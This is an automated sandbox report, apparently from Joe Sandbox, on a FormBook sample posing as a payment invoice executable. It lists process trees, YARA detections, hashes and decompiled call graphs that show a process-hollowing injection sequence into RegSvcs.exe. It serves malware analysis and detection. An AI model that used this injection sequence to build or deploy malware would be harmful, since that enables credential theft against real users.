                                                                                            Commandline:"C:\Users\user\Desktop\Due Payment Invoice PISS2024993.exe"
                                                                                            Imagebase:0xda0000
                                                                                            File size:764'928 bytes
                                                                                            MD5 hash:E36A9532EB81C28DD0ED418C61774138
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:3
                                                                                            Start time:09:29:03
                                                                                            Start date:24/10/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                            Imagebase:0x550000
                                                                                            File size:45'984 bytes
                                                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2419425677.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2420013773.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2421355928.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:5
                                                                                            Start time:09:29:21
                                                                                            Start date:24/10/2024
                                                                                            Path:C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\OJGHJXIyqEapPJjZGDfDlJeZArmxOoMlvpiiNmPZKvAMTUnY\cJjnESPXORw.exe"
                                                                                            Imagebase:0x90000
                                                                                            File size:140'800 bytes
                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3912731474.0000000003070000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Target ID:6
                                                                                            Start time:09:29:22
                                                                                            Start date:24/10/2024
                                                                                            Path:C:\Windows\SysWOW64\xcopy.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\SysWOW64\xcopy.exe"
                                                                                            Imagebase:0x5e0000
                                                                                            File size:43'520 bytes
                                                                                            MD5 hash:7E9B7CE496D09F70C072930940F9F02C
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3911460073.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3912564101.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3912510675.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:moderate
                                                                                            Has exited:false

                                                                                            Target ID:8
                                                                                            Start time:09:29:46
                                                                                            Start date:24/10/2024
                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                            Imagebase:0x7ff79f9e0000
                                                                                            File size:676'768 bytes
                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:12.1%
                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                              Signature Coverage:6.5%
                                                                                              Total number of Nodes:200
                                                                                              Total number of Limit Nodes:10
                                                                                              execution_graph 50955 182076a 50956 1820770 50955->50956 50960 98ddf48 50956->50960 50964 98ddf41 50956->50964 50957 182079d 50961 98ddf88 ResumeThread 50960->50961 50963 98ddfb9 50961->50963 50963->50957 50965 98ddf88 ResumeThread 50964->50965 50967 98ddfb9 50965->50967 50967->50957 50849 32974e0 50850 329750d 50849->50850 50855 32970d0 50850->50855 50852 32975ac 50859 3297100 50852->50859 50854 32979fb 50856 32970db 50855->50856 50857 3297100 2 API calls 50856->50857 50858 329a415 50857->50858 50858->50852 50860 329710b 50859->50860 50864 1495cc4 50860->50864 50868 14971b7 50860->50868 50861 329a5ac 50861->50854 50865 1495ccf 50864->50865 50872 1495cf4 50865->50872 50867 149726d 50867->50861 50869 14971fb 50868->50869 50870 1495cf4 2 API calls 50869->50870 50871 149726d 50870->50871 50871->50861 50873 1495cff 50872->50873 50874 14985a9 50873->50874 50876 149cd00 50873->50876 50874->50867 50877 149ccb3 50876->50877 50878 149cd06 50876->50878 50877->50874 50879 149cd55 50878->50879 50882 149cec0 50878->50882 50886 149ceb0 50878->50886 50879->50874 50883 149cecd 50882->50883 50885 149cf07 50883->50885 50890 149b720 50883->50890 50885->50879 50887 149cec0 50886->50887 50888 149cf07 50887->50888 50889 149b720 2 API calls 50887->50889 50888->50879 50889->50888 50891 149b72b 50890->50891 50893 149dc18 50891->50893 50894 149d024 50891->50894 50893->50893 50895 149d02f 50894->50895 50896 1495cf4 2 API calls 50895->50896 50897 149dc87 50896->50897 50901 149f9f0 50897->50901 50906 149fa08 50897->50906 50898 149dcc1 50898->50893 50902 149fa45 50901->50902 50903 149fa39 50901->50903 50902->50898 50903->50902 50911 32909c0 50903->50911 50915 32909b4 50903->50915 50907 149fa39 50906->50907 50908 149fa45 50906->50908 50907->50908 50909 32909c0 2 API calls 50907->50909 50910 32909b4 2 API calls 50907->50910 50908->50898 50909->50908 50910->50908 50912 32909eb 50911->50912 50913 3290a9a 50912->50913 50919 3291890 50912->50919 50916 32909c0 50915->50916 50917 3290a9a 50916->50917 50918 3291890 2 API calls 50916->50918 50918->50917 50921 32918f0 CreateWindowExW 50919->50921 50922 32918e4 CreateWindowExW 50919->50922 50920 32918d5 50920->50913 50921->50920 50922->50920 50968 149d620 DuplicateHandle 50969 149d6b6 50968->50969 50752 98d1b00 50753 98d1b1c 50752->50753 50756 98d2a28 50753->50756 50754 98d1bc6 50757 98d2a4a 50756->50757 50761 98d2a68 50757->50761 50765 98d2a78 50757->50765 50758 98d2a5e 50758->50754 50762 98d2a78 50761->50762 50769 98d2b38 50762->50769 50766 98d2a92 50765->50766 50768 98d2b38 2 API calls 50766->50768 50767 98d2ab5 50767->50758 50768->50767 50770 98d2b6c 50769->50770 50774 98d2ca8 50770->50774 50777 98d2ca0 50770->50777 50771 98d2ab5 50771->50758 50775 98d2cf3 NtQueryInformationProcess 50774->50775 50776 98d2d36 50775->50776 50776->50771 50778 98d2ca8 NtQueryInformationProcess 50777->50778 50780 98d2d36 50778->50780 50780->50771 50781 149d3d8 50782 149d41e GetCurrentProcess 50781->50782 50784 149d469 50782->50784 50785 149d470 GetCurrentThread 50782->50785 50784->50785 50786 149d4ad GetCurrentProcess 50785->50786 50787 149d4a6 50785->50787 50788 149d4e3 50786->50788 50787->50786 50789 149d50b GetCurrentThreadId 50788->50789 50790 149d53c 50789->50790 50970 18206f3 50977 98de508 50970->50977 50981 98de501 50970->50981 50971 1820711 50972 1820890 50971->50972 50975 98de5c8 WriteProcessMemory 50971->50975 50976 98de5c1 WriteProcessMemory 50971->50976 50975->50971 50976->50971 50978 98de548 VirtualAllocEx 50977->50978 50980 98de585 50978->50980 50980->50971 50982 98de548 VirtualAllocEx 50981->50982 50984 98de585 50982->50984 50984->50971 50923 18204d1 50925 182043c 50923->50925 50924 1820f9e 50925->50924 50929 98de850 50925->50929 50933 98de845 50925->50933 50930 98de8d9 CreateProcessA 50929->50930 50932 98dea9b 50930->50932 50934 98de8d9 CreateProcessA 50933->50934 50936 98dea9b 50934->50936 50937 1820956 50938 18208e9 50937->50938 50939 1820659 50937->50939 50942 98de6b8 50938->50942 50946 98de6b1 50938->50946 50943 98de703 ReadProcessMemory 50942->50943 50945 98de747 50943->50945 50945->50939 50947 98de703 ReadProcessMemory 50946->50947 50949 98de747 50947->50949 50949->50939 50985 98d3778 50986 98d379c 50985->50986 50990 98d40b8 50986->50990 50994 98d40b1 50986->50994 50998 98d3368 50986->50998 50991 98d40fe OutputDebugStringW 50990->50991 50993 98d4137 50991->50993 50993->50986 50995 98d40fe OutputDebugStringW 50994->50995 50997 98d4137 50995->50997 50997->50986 50999 98d4168 CloseHandle 50998->50999 51001 98d41d6 50999->51001 51001->50986 51002 18205f4 51003 1820587 51002->51003 51004 182058c 51002->51004 51005 98de845 CreateProcessA 51003->51005 51006 98de850 CreateProcessA 51003->51006 51005->51004 51006->51004 50827 18209ba 50828 1820c40 50827->50828 50832 98de428 50828->50832 50836 98de430 50828->50836 50829 1820c5b 50833 98de475 Wow64SetThreadContext 50832->50833 50835 98de4bd 50833->50835 50835->50829 50837 98de475 Wow64SetThreadContext 50836->50837 50839 98de4bd 50837->50839 50839->50829 50791 149ac50 50792 149ac5f 50791->50792 50795 149ad48 50791->50795 50800 149ad37 50791->50800 50796 149ad59 50795->50796 50797 149ad7c 50795->50797 50796->50797 50798 149af80 GetModuleHandleW 50796->50798 50797->50792 50799 149afad 50798->50799 50799->50792 50801 149ad59 50800->50801 50802 149ad7c 50800->50802 50801->50802 50803 149af80 GetModuleHandleW 50801->50803 50802->50792 50804 149afad 50803->50804 50804->50792 50840 1820c3b 50841 1820d80 50840->50841 50842 98de5c8 WriteProcessMemory 50841->50842 50843 98de5c1 WriteProcessMemory 50841->50843 50842->50841 50843->50841 51007 3294050 51008 3294092 51007->51008 51010 3294099 51007->51010 51009 32940ea CallWindowProcW 51008->51009 51008->51010 51009->51010 50805 1821218 50806 18213a3 50805->50806 50807 182123e 50805->50807 50807->50806 50810 1821490 PostMessageW 50807->50810 50812 1821498 PostMessageW 50807->50812 50811 1821504 50810->50811 50811->50807 50813 1821504 50812->50813 50813->50807 50814 1820699 50815 18206bc 50814->50815 50819 98de5c8 50815->50819 50823 98de5c1 50815->50823 50816 1820e0f 50820 98de610 WriteProcessMemory 50819->50820 50822 98de667 50820->50822 50822->50816 50824 98de610 WriteProcessMemory 50823->50824 50826 98de667 50824->50826 50826->50816 50950 18207d9 50951 18207df 50950->50951 50952 1820890 50951->50952 50953 98de5c8 WriteProcessMemory 50951->50953 50954 98de5c1 WriteProcessMemory 50951->50954 50953->50951 50954->50951 50844 18207bc 50845 18207c9 50844->50845 50846 1820a53 50845->50846 50847 98de428 Wow64SetThreadContext 50845->50847 50848 98de430 Wow64SetThreadContext 50845->50848 50847->50845 50848->50845

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 339 32974e0-329750b 340 329750d 339->340 341 3297512-329810d call 32970d0 call 32970e0 * 20 call 32970f0 call 3297100 call 3297110 * 3 call 3297120 call 3297130 call 3297140 call 3297150 call 3297160 call 3297170 call 3297180 call 3297190 call 149eb2d call 32971a0 call 32971b0 call 32971c0 call 32971d0 call 32971e0 call 32971f0 call 32971a0 call 3297200 call 32971e0 339->341 340->341 531 329810f 341->531 532 3298114-3298253 341->532 531->532 546 329825f-3299bff call 3297210 call 32971a0 call 3297200 call 32971e0 call 3297210 call 32971a0 call 3297200 call 32971e0 call 3297210 call 32971a0 call 3297200 call 32971e0 call 3297210 call 32971a0 call 32971e0 call 3297210 call 32971a0 call 32971e0 call 3297210 call 3297190 call 32971a0 call 32971e0 call 32971a0 call 3297200 call 32971e0 call 3297210 call 32971a0 call 3297200 call 32971e0 call 3297210 call 32971a0 call 3297200 call 32971e0 call 3297210 call 3297190 call 32971a0 call 32971e0 call 32971a0 call 32971e0 call 3297210 call 32971a0 call 32971e0 call 3297210 call 32971a0 call 32971e0 call 3297210 call 32971a0 call 32971e0 call 3297210 call 32971a0 call 32971e0 call 3297210 call 32971a0 call 32971e0 call 3297210 call 3297190 call 32971a0 call 32971e0 call 32971a0 call 32971e0 call 3297210 call 3297120 call 3297130 call 3297140 call 3297150 call 3297170 call 3297180 532->546 828 3299c29 546->828 829 3299c01-3299c0d 546->829 832 3299c2f-3299da8 call 3297220 call 32971a0 call 3297210 828->832 830 3299c0f-3299c15 829->830 831 3299c17-3299c1d 829->831 833 3299c27 830->833 831->833 849 3299daa-3299db6 832->849 850 3299dd2 832->850 833->832 851 3299db8-3299dbe 849->851 852 3299dc0-3299dc6 849->852 853 3299dd8-3299f51 call 3297220 call 32971a0 call 3297210 850->853 854 3299dd0 851->854 852->854 870 3299f7b 853->870 871 3299f53-3299f5f 853->871 854->853 874 3299f81-329a261 call 3297220 call 32971a0 call 3297210 call 3297230 call 3297240 call 3297250 call 3297260 * 2 call 3297130 870->874 872 3299f69-3299f6f 871->872 873 3299f61-3299f67 871->873 875 3299f79 872->875 873->875 910 329a28b 874->910 911 329a263-329a26f 874->911 875->874 914 329a291-329a3d2 call 3297270 call 3297280 call 3297290 call 32972a0 call 3297150 call 32972b0 call 32972c0 * 3 910->914 912 329a279-329a27f 911->912 913 329a271-329a277 911->913 916 329a289 912->916 913->916 916->914
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2200038853.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3290000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Ppeq
                                                                                              • API String ID: 0-2167432870
                                                                                              • Opcode ID: 7d8b057cfe16b56b3cc93e5c19f3e2e6e503c3213f0d31324e9b70a8a906b30a
                                                                                              • Instruction ID: 245d40fbe4134cbabd568194630fec0c5e3a0d1fef0947d5e2cda5bd643992ca
                                                                                              • Opcode Fuzzy Hash: 7d8b057cfe16b56b3cc93e5c19f3e2e6e503c3213f0d31324e9b70a8a906b30a
                                                                                              • Instruction Fuzzy Hash: 3953C474A10219CFDB25DF28C894BA9B7B1FF89304F1145E9E609AB361DB31AE81CF45

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 940 32974d2-329750b 941 329750d 940->941 942 3297512-3297591 940->942 941->942 950 329759b-32975a7 call 32970d0 942->950 952 32975ac-32975c3 950->952 954 32975cd-32975d9 call 32970e0 952->954 956 32975de-32979e0 call 32970e0 * 19 call 32970f0 954->956 1038 32979ea-32979f6 call 3297100 956->1038 1040 32979fb-3297af8 call 3297110 * 3 1038->1040 1057 3297b03-3297b16 call 3297120 1040->1057 1059 3297b1b-3297b1c 1057->1059 1060 3297b26-3297b59 call 3297130 1059->1060 1062 3297b5e-3297c02 1060->1062 1069 3297c0c-3297c15 1062->1069 1070 3297c1d-3297caf call 3297140 call 3297150 call 3297160 1069->1070 1078 3297cb9-3297ccd call 3297170 1070->1078 1080 3297cd2-3297d00 call 3297180 1078->1080 1083 3297d05-3297d14 call 3297190 1080->1083 1085 3297d19-3297dcc 1083->1085 1092 3297dd6-3297de1 call 149eb2d 1085->1092 1093 3297de7-3297f45 call 32971a0 call 32971b0 call 32971c0 call 32971d0 call 32971e0 1092->1093 1112 3297f50-3297f82 call 32971f0 1093->1112 1115 3297f87-3297f9c call 32971a0 1112->1115 1117 3297fa1-3297fb5 call 3297200 1115->1117 1119 3297fba-32980a9 call 32971e0 1117->1119 1128 32980b0-32980ce 1119->1128 1129 32980d9-32980e5 1128->1129 1130 32980ef-32980f7 1129->1130 1131 32980fd-329810d 1130->1131 1132 329810f 1131->1132 1133 3298114-329822e 1131->1133 1132->1133 1146 3298239-3298253 1133->1146 1147 329825f-3299bff call 3297210 call 32971a0 call 3297200 call 32971e0 call 3297210 call 32971a0 call 3297200 call 32971e0 call 3297210 call 32971a0 call 3297200 call 32971e0 call 3297210 call 32971a0 call 32971e0 call 3297210 call 32971a0 call 32971e0 call 3297210 call 3297190 call 32971a0 call 32971e0 call 32971a0 call 3297200 call 32971e0 call 3297210 call 32971a0 call 3297200 call 32971e0 call 3297210 call 32971a0 call 3297200 call 32971e0 call 3297210 call 3297190 call 32971a0 call 32971e0 call 32971a0 call 32971e0 call 3297210 call 32971a0 call 32971e0 call 3297210 call 32971a0 call 32971e0 call 3297210 call 32971a0 call 32971e0 call 3297210 call 32971a0 call 32971e0 call 3297210 call 32971a0 call 32971e0 call 3297210 call 3297190 call 32971a0 call 32971e0 call 32971a0 call 32971e0 call 3297210 call 3297120 call 3297130 call 3297140 call 3297150 call 3297170 call 3297180 1146->1147 1429 3299c29 1147->1429 1430 3299c01-3299c0d 1147->1430 1433 3299c2f-3299da8 call 3297220 call 32971a0 call 3297210 1429->1433 1431 3299c0f-3299c15 1430->1431 1432 3299c17-3299c1d 1430->1432 1434 3299c27 1431->1434 1432->1434 1450 3299daa-3299db6 1433->1450 1451 3299dd2 1433->1451 1434->1433 1452 3299db8-3299dbe 1450->1452 1453 3299dc0-3299dc6 1450->1453 1454 3299dd8-3299f51 call 3297220 call 32971a0 call 3297210 1451->1454 1455 3299dd0 1452->1455 1453->1455 1471 3299f7b 1454->1471 1472 3299f53-3299f5f 1454->1472 1455->1454 1475 3299f81-329a261 call 3297220 call 32971a0 call 3297210 call 3297230 call 3297240 call 3297250 call 3297260 * 2 call 3297130 1471->1475 1473 3299f69-3299f6f 1472->1473 1474 3299f61-3299f67 1472->1474 1476 3299f79 1473->1476 1474->1476 1511 329a28b 1475->1511 1512 329a263-329a26f 1475->1512 1476->1475 1515 329a291-329a3d2 call 3297270 call 3297280 call 3297290 call 32972a0 call 3297150 call 32972b0 call 32972c0 * 3 1511->1515 1513 329a279-329a27f 1512->1513 1514 329a271-329a277 1512->1514 1517 329a289 1513->1517 1514->1517 1517->1515
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2200038853.0000000003290000.00000040.00000800.00020000.00000000.sdmp, Offset: 03290000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_3290000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Ppeq
                                                                                              • API String ID: 0-2167432870
                                                                                              • Opcode ID: 685c306358b5be78f64d9ed4d51ef6eef39ec30edd5b5c9e2d6dcd9ca2ed55ad
                                                                                              • Instruction ID: 923fef27e24c66182eccd47066704d9e34f3372baeff88471202f717b27c9625
                                                                                              • Opcode Fuzzy Hash: 685c306358b5be78f64d9ed4d51ef6eef39ec30edd5b5c9e2d6dcd9ca2ed55ad
                                                                                              • Instruction Fuzzy Hash: 2453C374A10219CFDB25DF28C894BA9B7B1FF89304F1145E9E609AB361DB31AE81CF45

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1740 98de845-98de8e5 1742 98de91e-98de93e 1740->1742 1743 98de8e7-98de8f1 1740->1743 1750 98de977-98de9a6 1742->1750 1751 98de940-98de94a 1742->1751 1743->1742 1744 98de8f3-98de8f5 1743->1744 1745 98de918-98de91b 1744->1745 1746 98de8f7-98de901 1744->1746 1745->1742 1748 98de905-98de914 1746->1748 1749 98de903 1746->1749 1748->1748 1752 98de916 1748->1752 1749->1748 1757 98de9df-98dea99 CreateProcessA 1750->1757 1758 98de9a8-98de9b2 1750->1758 1751->1750 1753 98de94c-98de94e 1751->1753 1752->1745 1755 98de971-98de974 1753->1755 1756 98de950-98de95a 1753->1756 1755->1750 1759 98de95c 1756->1759 1760 98de95e-98de96d 1756->1760 1771 98dea9b-98deaa1 1757->1771 1772 98deaa2-98deb28 1757->1772 1758->1757 1762 98de9b4-98de9b6 1758->1762 1759->1760 1760->1760 1761 98de96f 1760->1761 1761->1755 1763 98de9d9-98de9dc 1762->1763 1764 98de9b8-98de9c2 1762->1764 1763->1757 1766 98de9c4 1764->1766 1767 98de9c6-98de9d5 1764->1767 1766->1767 1767->1767 1769 98de9d7 1767->1769 1769->1763 1771->1772 1782 98deb38-98deb3c 1772->1782 1783 98deb2a-98deb2e 1772->1783 1785 98deb4c-98deb50 1782->1785 1786 98deb3e-98deb42 1782->1786 1783->1782 1784 98deb30 1783->1784 1784->1782 1788 98deb60-98deb64 1785->1788 1789 98deb52-98deb56 1785->1789 1786->1785 1787 98deb44 1786->1787 1787->1785 1790 98deb76-98deb7d 1788->1790 1791 98deb66-98deb6c 1788->1791 1789->1788 1792 98deb58 1789->1792 1793 98deb7f-98deb8e 1790->1793 1794 98deb94 1790->1794 1791->1790 1792->1788 1793->1794 1796 98deb95 1794->1796 1796->1796
                                                                                              APIs
                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 098DEA86
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateProcess
                                                                                              • String ID:
                                                                                              • API String ID: 963392458-0
                                                                                              • Opcode ID: 3d0d85148bc8503bc80a071412486f307303be3310e1951bbc7ec17c9f08c96b
                                                                                              • Instruction ID: 44f56aa4efaa926e171b869b481daaa7d77369351c18ff013694e18804fcd490
                                                                                              • Opcode Fuzzy Hash: 3d0d85148bc8503bc80a071412486f307303be3310e1951bbc7ec17c9f08c96b
                                                                                              • Instruction Fuzzy Hash: D6A17A71D012199FEB20DF68C881BEDBBB2AF49310F14816AE849EB351DB749985CF91
                                                                                              APIs
                                                                                              • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 098D2D27
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: InformationProcessQuery
                                                                                              • String ID:
                                                                                              • API String ID: 1778838933-0
                                                                                              • Opcode ID: e6cff7c982fb0e5737db551ea043123dfd975af419ecfa1973793f0a3d96e9c5
                                                                                              • Instruction ID: 8b2053b1955e81e02e42fc5c0aeac7e6b417830a77cccadbc79624b3b814e51c
                                                                                              • Opcode Fuzzy Hash: e6cff7c982fb0e5737db551ea043123dfd975af419ecfa1973793f0a3d96e9c5
                                                                                              • Instruction Fuzzy Hash: CC21CFB6900359DFCB10CF9AD884ADEBBF4FB49310F10842AE918A7610C775A944CFA1
                                                                                              APIs
                                                                                              • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 098D2D27
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID: InformationProcessQuery
                                                                                              • String ID:
                                                                                              • API String ID: 1778838933-0
                                                                                              • Opcode ID: 5bb53820ff3fd34b1f16b1539adbf826bc13febb0e423ba64667be9a3af4f913
                                                                                              • Instruction ID: 68748c3b54d7f73a46fb3fdb13b7fa3a99859a1e61cb4d98a683e4d307c266c9
                                                                                              • Opcode Fuzzy Hash: 5bb53820ff3fd34b1f16b1539adbf826bc13febb0e423ba64667be9a3af4f913
                                                                                              • Instruction Fuzzy Hash: 7421CEB5901259DFCB10CF9AD884ADEFBF4FB48310F10842AE928A7310C775A944CFA5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 75056af0f7054b491561e48e686de7df55e13a3d53b71ef51ccfa6a949e73b6a
                                                                                              • Instruction ID: 9007d1cb6187cf168f158ed6f364d80fe4ebfa4b45188a94628765efcafa70f2
                                                                                              • Opcode Fuzzy Hash: 75056af0f7054b491561e48e686de7df55e13a3d53b71ef51ccfa6a949e73b6a
                                                                                              • Instruction Fuzzy Hash: 9F428074E01218CFDB64CFA9C984B9DBBB2BF48311F1481A9E809AB355D731AE81CF51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2197381325.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1820000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bb3e060556cc34059add21fb5425400b9e55010b4f3d73d6b22745653d8f0345
                                                                                              • Instruction ID: 62d4f0614f24b0f99758f4fef832420ec3d07d4cb93c7db19df2ce3b55d6849c
                                                                                              • Opcode Fuzzy Hash: bb3e060556cc34059add21fb5425400b9e55010b4f3d73d6b22745653d8f0345
                                                                                              • Instruction Fuzzy Hash: E3E1F3307006158FDB26DB7AC454BAEBBF7AF99740F24446ED206DB290CB35EA81C751
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 02b4b4a19a187768625bb32fb46829d96dc39c9d0fa04127204b9a915bde60cf
                                                                                              • Instruction ID: a0b7b4822bf9528fb2a4b34b762aa1280644e6b5e0a6bedb4617da6c5c7fd46e
                                                                                              • Opcode Fuzzy Hash: 02b4b4a19a187768625bb32fb46829d96dc39c9d0fa04127204b9a915bde60cf
                                                                                              • Instruction Fuzzy Hash: F9614675E012599FCF04DFA9D8849AEBBF2FF89310F14842AE815EB364DB349906CB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2197381325.0000000001820000.00000040.00000800.00020000.00000000.sdmp, Offset: 01820000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1820000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cfbb41b5bfc192acd24f36a7d9123abcd6ccd59cda3d5fb6e4b9f4c3dfe1c432
                                                                                              • Instruction ID: 5c11818c4e6e48b68e22c9c8bcf50d3761393f056bf6e473b1310cf6be4ad273
                                                                                              • Opcode Fuzzy Hash: cfbb41b5bfc192acd24f36a7d9123abcd6ccd59cda3d5fb6e4b9f4c3dfe1c432
                                                                                              • Instruction Fuzzy Hash: 2B71F671D05629CBEB25CF6AC844BE9BBB6BF89304F00C1EAD50DA6254EB745AC5CF40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 88dbd3fec5ab19b39401f86a0ccc0abe544b8fd2d01f00622682b435fb719ca9
                                                                                              • Instruction ID: 23994864086b486045a2c186c6c65368024ec71943b6492003ecae9880dc0ea5
                                                                                              • Opcode Fuzzy Hash: 88dbd3fec5ab19b39401f86a0ccc0abe544b8fd2d01f00622682b435fb719ca9
                                                                                              • Instruction Fuzzy Hash: 7571D974E05258CFEB18CFAAC894B9DBBF2BF89300F1481AAE805AB365D7355941CF51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2206170592.00000000098D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_98d0000_Due Payment Invoice PISS2024993.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0e76b1ddd58bd87818f7859088155224ea8f3372af75c310451f9e8abc2c806e
                                                                                              • Instruction ID: edf01c25912b2a0315aac9f9a60e0b8bde90569667ae32722bf024a8d863dd49
